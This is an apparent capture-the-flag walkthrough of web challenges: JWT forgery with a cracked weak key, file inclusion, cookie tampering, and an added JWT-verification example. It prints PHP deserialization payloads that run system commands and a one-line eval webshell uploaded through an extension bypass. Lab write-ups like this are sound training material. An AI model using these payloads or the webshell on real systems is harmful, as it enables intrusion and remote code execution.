1. Honey Snow Ice City Ji police store
Opened the challenge and saw that the prompt says the hidden milk tea (the ninth cup) gives the flag, but only eight cups are shown, so we guess the check is done in the front-end code.
Change id=1 to id=9 in the page source, then go back to the page and click on Original Milk Tea to bring up the flag.
#flag{7d43cc8863ad0ee649048e562fde53ec}
2. Summon the Dragon
Opened the challenge and found a game; after a few rounds it was clearly too hard to beat legitimately.
Pressed F12 to view the page source and found a long string in one of the files; it looks like JSFuck (a JavaScript obfuscation in the spirit of Brainfuck).
Run it through a JSFuck decoder to get the flag.
#flag{fdf9a88ec4fdd9e3dedaafeece5cc248}
3. flag
Opened the challenge and pressed F12, found a hint about the flag; scanning with dirsearch turned up additional files.
Accessing one of them gives the third part, flag3: c0ad71dadd11}
Then we captured the request in BurpSuite and resent it to see what comes back; this yields the second part, flag2: 3ca8737a70f029d
We notice a Set-Cookie header in the response; changing the id to 1 and resending the request gives the first part, flag1: flag{7ac5b
Splicing the three parts together gives the final result: flag{7ac5b3ca8737a70f029dc0ad71dadd11}
4. jwt
Opened the challenge and found a login and registration page; we guess the intended path is vertical privilege escalation, from a normal user to the admin user.
Log in with a registered username and press F12. Since the challenge is called jwt, we look for the JWT value, then brute-force its signing secret with a tool to recover the key: SYSA
A note on JWT (JSON Web Token): the token consists of three parts in a compact form, separated by dots (.).
Then decode the JWT value via the online site (if it is an offline competition, split the token on . and base64-decode each segment).
Next, change the username to admin, sign with the recovered key, and get the new JWT value: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.9avq5ApZ-XZul2kbon8z2cB6Y4bNru_0nnIZfJ1mO50
Replace the page's JWT value with the new one and reload the page.
This gives us admin privileges, and clicking on Personal Center shows the flag.
#flag{ec39c705cfb5295f9dddcedc819a1659}
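The root cause in this challenge is a guessable HS256 secret combined with a server that trusts whatever claims the token carries. As an added example (not part of the write-up), the following Python does the offline inspection step described above (split on ".", base64url-decode each segment) and shows the verification a server must perform before honouring a claim like username=admin: check the algorithm, recompute the HMAC over header.payload, and compare in constant time. The demo key is a constructed placeholder.

```python
import base64
import hashlib
import hmac
import json

def b64url_decode(segment):
    # base64url omits padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def decode_unverified(token):
    """Split on '.' and base64-decode header and payload, the offline
    inspection step from the write-up. Never authorise on these values."""
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))

def sign_hs256(payload, key):
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload))
    mac = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)

def verify_hs256(token, key):
    """Return the payload only if alg is HS256 and the HMAC over
    header.payload matches the signature; otherwise None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        # Refuse 'none' and any other algorithm than the one we issued.
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None
        expected = hmac.new(key, (header_b64 + "." + payload_b64).encode(),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        return json.loads(b64url_decode(payload_b64))
    except ValueError:  # malformed token, bad base64 or bad JSON
        return None

# Constructed demo key (hypothetical): long and random, unlike the 4-byte
# key recovered in the write-up, which a wordlist attack finds quickly.
DEMO_KEY = b"constructed-demo-key-replace-with-32-random-bytes"
```

With a key of this size, editing the payload to username=admin while keeping the old signature fails verify_hs256, which is exactly the check the challenge server was missing.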
5. Sign in
Opened the challenge; the submit button did nothing.
Sure enough, capturing the request with BurpSuite and resending it shows from the response that a POST request is required, with a parameter named key; the first attempt is key=flag
Then follow the prompts in the responses, adjusting the parameter value until the flag is returned.
#flag{fa3f77dd58a0a8f990bb6292da75618f}
6. File inclusion
Open the challenge and capture the request with BurpSuite; the response carries a Set-Cookie header, and from the challenge description we guess a pseudo-protocol is involved.
Take the base64 ciphertext and decode it in CyberChef.
Here we guess the session file lives in the /tmp directory, named sess_ followed by the session id; the session id is in the response packet.
Read the flag via cat or tac.
#flag{43306e8113f53ece238c0a124432ce19}
7. Don't touch me
Open the challenge, press F12, and find the hint.
Then follow the method given in the F12 hint step by step.
Just visit
#flag{0cee5a97f12b172ceeea2e9f67b7413e}
8. very nice
This challenge tests basic deserialization.
<?php
class Example
{
    // payload property: the deserialized value the target executes
    public $sys="system('ls');";
}
$a = new Example();
echo serialize($a);
?>
# First list all files: O:7:"Example":1:{s:3:"sys";s:13:"system('ls');";}
We find the target file is present; because including it directly would execute it, we use include plus the php://filter pseudo-protocol to read it base64-encoded.
<?php
class Example
{
    // the file name after resource= is not shown in the write-up
    public $sys="include('php://filter/read=convert.base64-encode/resource=');";
}
$a = new Example();
echo serialize($a);
?>
#O:7:"Example":1:{s:3:"sys";s:69:"include('php://filter/read=convert.base64-encode/resource=');";}
Base64-decode the output to get the flag.
#flag{202cb962ac59075b964b07152d234b70}
Alternatively, following some tricks found online:
<?php
class Example
{
public $sys="system('tac f*');";
}
$a = new Example();
echo serialize($a);
?>
#O:7:"Example":1:{s:3:"sys";s:17:"system('tac f*');";}
#flag{202cb962ac59075b964b07152d234b70}
9. deceptive
Capture the request, change the cookie value to admin, and that's it.
#flag{10e35c76602b330149ef009e0b484d8f}
Opened the challenge and found a file upload point for a webshell, along with code that apparently hides a blacklist.
A code audit showed the blacklist can be bypassed by doubling the file extension.
One-line webshell:
<?php @eval($_POST['aaa']);?>
Then just connect to it with AntSword.
#flag{a89f40341f4271659154829a2215f428}